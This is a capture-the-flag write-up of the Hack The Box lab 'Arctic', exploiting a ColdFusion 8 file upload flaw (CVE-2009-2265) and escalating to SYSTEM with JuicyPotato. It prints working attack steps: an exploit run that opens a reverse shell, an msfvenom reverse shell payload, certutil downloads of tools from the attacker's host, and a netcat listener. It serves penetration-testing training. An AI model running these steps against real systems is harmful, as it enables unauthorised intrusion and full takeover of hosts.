Search
HTB Arctic Write-up
4 min read

HTB Arctic Write-up

Vorkharium's Picture
Vorkharium in Write-ups HTB OSCP+ Easy Windows ColdFusion CVE Arbitrary-File-Upload JuicyPotato MSFVenom

Table of Contents

Enumeration

Nmap

# Step 1 - Find active ports
nmap -p- -Pn --min-rate 10000 10.129.134.186

# Step 2 - Focus scan on the active ports found
nmap -A -T4 -Pn -p135,8500,49154 10.129.134.186

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-17 23:44 EST
Nmap scan report for 10.129.134.186
Host is up (0.036s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  http    JRun Web Server
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.60 seconds

There are three ports open, the ports 135 and 49154 seem to use RPC and the port 8500 seems to be some kind of website.

Website Enumeration

Lets use our web browser to visit the port 8500:

http://10.129.134.186:8500/

Upon visiting it, we can see an index containing two directories:

CFIDE/               dir   03/22/17 08:52 μμ
cfdocs/              dir   03/22/17 08:55 μμ

They seem to be related to ColdFusion (CF).

Clicking on them and doing some enumeration, we found the following login portal:

http://10.129.134.186:8500/CFIDE/administrator/

Now we can see that the target is indeed running Adobe ColdFusion 8.

We tried some default credentials on the login portal to get access. But we werent successful.

Foothold

CVE-2009-2265 - Arbitrary File Upload

Searching on Google and searchsploit we found the CVE-2009-2265.

Lets get it using searchsploit:

searchsploit -m 50057
cp 50057.py exploit.py

Edit the exploit changing the following part of the code with our Kali tun0 IP and port, target IP and target port:

if __name__ == '__main__':
    # Define some information
    lhost = '10.10.14.206'
    lport = 8443
    rhost = "10.129.134.186"
    rport = 8500
    filename = uuid.uuid4().hex

Run the exploit after saving the changes (We dont need to start a nc listener, the exploit will do that for us):

# Run the exploit
python3 exploit.py

Nice! We got access as tolis:

listening on [any] 8443 ...
connect to [10.10.14.206] from (UNKNOWN) [10.129.134.186] 49269







Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

User Flag

Now we can get the user.txt flag:

type C:\Users\tolis\Desktop\user.txt

Privilege Escalation

Using JuicyPotato.exe to abuse SeImpersonatePrivilege enabled to get access as system with a msfvenom reverse shell

Enumerating the system we found out that the user has SeImpersonatePrivilege enabled:

C:\ColdFusion8\runtime\bin>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We will try using JuicyPotato.exe to escalate privileges.

Lets download it and also create a shell.exe reverse shell payload with msfvenom:

# Get JuicyPotato.exe
https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

# Create shell.exe reverse shell payload with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.206 LPORT=9001 -a x64 --platform Windows -f exe -o shell.exe

Now move it into the target and run it:

# On Kali
python3 -m http.server 8080

# On target CLI
cd C:\Users\Public\Documents
certutil.exe -urlcache -split -f http://10.10.14.206:8080/JuicyPotato.exe JuicyPotato.exe
certutil.exe -urlcache -split -f http://10.10.14.206:8080/shell.exe shell.exe

# Start nc listener on Kali
nc -lvnp 9001

# Now run JuicyPotato.exe
JuicyPotato.exe -t * -p C:\Users\Public\Documents\shell.exe -l 443

It worked! We got access as system:

listening on [any] 9001 ...
connect to [10.10.14.206] from (UNKNOWN) [10.129.134.186] 49361
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Root Flag

Now we can get the root.txt flag:

type C:\Users\Administrator\Desktop\root.txt

You may also like

HTB Brevi Moduli Solution (Without SageMath)
3 min read

HTB Brevi Moduli Solution (Without SageMath)

HTB Cryptography Challenge

Vorkharium's Picture
Vorkharium in Solution HTB Challenges Python Script Cryptography RSA
HTB Devvortex Write-up
7 min read

HTB Devvortex Write-up

Part of the OSCP+ Preparation Series

Vorkharium's Picture
Vorkharium in Write-ups HTB OSCP+ Linux Easy Vhost-Enumeration CVE Joomla MySQL Credentials-in-Database apport-cli
HTB Flight Write-up
16 min read

HTB Flight Write-up

Part of the OSCP+ Preparation Series

Vorkharium's Picture
Vorkharium in Write-ups HTB OSCP+ Hard Windows Active-Directory Vhost-Enumeration Domain-User-Enumeration AD-Password-Spraying Password-Reuse SMB-Share-Write-Permission-Abuse .ini Capturing-NTLMv2-Hashes-with-SMB-Server PHP-Reverse-Shell Chisel.exe Port-Forwarding RunasCs.exe RunasCs.exe-Reverse-Shell Microsoft-IIS cmdasp.aspx JuicyPotatoNG

Latest Posts

HTB Brevi Moduli Solution (Without SageMath)
3 min read

HTB Brevi Moduli Solution (Without SageMath)

Vorkharium's Picture
Vorkharium
HTB Devvortex Write-up
7 min read

HTB Devvortex Write-up

Vorkharium's Picture
Vorkharium

Explore Tags

.PFX .bat .ini .mdb ACLs AChat AD-Password-Spraying API AS-REP-Roasting Active-Directory Active-Directory-Enumeration Alternative-Without-Metasploit Arbitrary-File-Read Arbitrary-File-Upload Azure-AD-Connect Bash-History Bash-Script Blind-SSRF BloodHound Buffer-Overflow BusyBox CVE CanRestart Capturing-NTLMv2-Hashes Capturing-NTLMv2-Hashes-with-SMB-Server Challenges Cheatsheets Chisel.exe ColdFusion Command-Injection Create-id_rsa Credential-Dumping Credential-Hunting Credentials-in-DB-File Credentials-in-Database Credentials-in-Registry Cron-Job Cryptography DCSync Default-Credentials Docker Domain-User-Enumeration Easy Etc-Shadow FTP FTP-Anonymous File-Upload-Bypass Fuzzing GPP-cPassword GTFOBins-Shell GenericAll Git Git-Commit Gitea Groovy-Reverse-Shell HTB Hard Incognito.exe Jenkins Joomla JuicyPotato JuicyPotatoNG KeePass-.kdbx Kerberoasting LDAP LDAP-Anonymous LDAP-Saved-Password Linux Linux-Relative-Path-Abuse Login-Brute-Force MD5-Hash MSFVenom MSSQL Magic-Bytes Manual-SQL-Injection Medium Microsoft-IIS Mount-NFS MySQL NetExec Nmap-SUID OSCP+ OSINT PHP-Reverse-Shell Pass-the-Hash Passback-LDAP-Attack Password-Reuse Password-Spraying Path-Traversal Pivoting Port-Forwarding PowerShell-History PowerUp.ps1 PowerView.ps1 Printer PsExec Python Python-Script RDP RFI RPC RPC-Null-Session RSA Relative-Path-Exploitation Runas.exe RunasCs.exe RunasCs.exe-Reverse-Shell SAM-SYSTEM-Dump SID-Recycle-Bin SMB SMB-Null-Session SMB-PsExec SMB-Share-Write-Permission-Abuse SMB-Shares SNMP SQL-Injection SQL-Injection-Bypass SQLMap SSH SSH-Brute-Force SUID Script Searchor Server-Operators Service-Restart Shadow Solution Stored-Credentials Sudo-l THM Tar-Wildcard-Expansion Telnet Tomcat Tools Unix Unquoted-Service-Path Username-Pattern Vhost-Enumeration WAR-Reverse-Shell WP-Template-PHP-Reverse-Shell Weak-Credentials Weak-File-Permission Web-Pentesting WinRM WinRM-.pem Windows Windows-Kernel-Exploit WordPress Write-ups WriteDacl XSRF apport-cli binwalk cmdasp.aspx pspy rdesktop sc.exe